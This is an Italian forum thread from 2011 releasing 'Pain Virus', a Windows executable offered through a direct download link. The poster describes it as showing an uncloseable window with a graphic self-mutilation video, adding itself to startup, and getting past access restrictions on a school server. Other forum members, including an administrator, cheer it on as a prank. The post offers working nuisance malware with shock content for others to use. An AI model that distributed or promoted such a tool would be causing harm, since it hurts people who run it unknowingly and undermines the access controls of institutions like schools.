[WIN] Pain virus

I nostri prodotti per Windows, naturalmente freeware.
  • Pubblicità

[WIN] Pain virus

Messaggioda {NP} Final » 04/05/2011, 22:13

staffbux software pain virus

Pain Virus - Versione Aplha 1.2

Requisiti di sistema:
• Sistema operativo: Windows XP/Vista/7;
• Net Framework 2.0 o superiore;
• Accesso a internet.

Funzionamento del programma:
Questo virus è stato realizzato parecchi mesi fa, volevo migliorarlo ma dato che non ho mai tempo a sufficienza ho deciso di rilasciare per ora una beta. Una volta avviato, il virus farà partire una schermata al centro dello schermo che non potrà essere chiusa. All'interno di questa finestra, se scrolliamo il webbrowser verso il basso potremmo vedere il famoso video "Olympics of Pain" (rappresenta un uomo che si evira il pene). In virus si piazzerà automaticamente in esecuzione automatica, bypassando le restrizioni d'accesso se siete un moderatore con permessi litimati (o almeno, io sono riuscito a bypassare le protezioni imposte dal server della mia scuola). Per rimuovere questo virus bisognerà entrare in modalità provvisoria o terminare il processo ed eliminare il file in esecuzione automatica di nome "eps.exe".

Bugs e avvertenze:
Potrebbe capitare di non riuscire a visualizzare il video nella finestra di avvio ogni tanto, ma darà comunque molto fastidio vedere una finestra che occupa 2/3 dello schermo ;)

Download: http://npmappingteam.altervista.org/Server/pain/eps.exe
{NP} Final

[WIN] Pain virus

Messaggioda Edoardo » 04/05/2011, 22:36

Oddio final, mi avevi passato il link del video in privato e ho veramente desiderato di non averlo mai visto! Il video fa veramente schifo!

Questo deve essere veramente uno scherzo bastardo! Ahahah, grazie buon Final!
Edoardo
Amministratore

[WIN] Pain virus

Messaggioda fabox993 » 05/05/2011, 13:34

Ahah grandissimo!!

PS: mamma mia quel video...
fabox993

Torna a SB softwares

• Discussioni correlate
    Risposte
    Visite
    Ultimo messaggio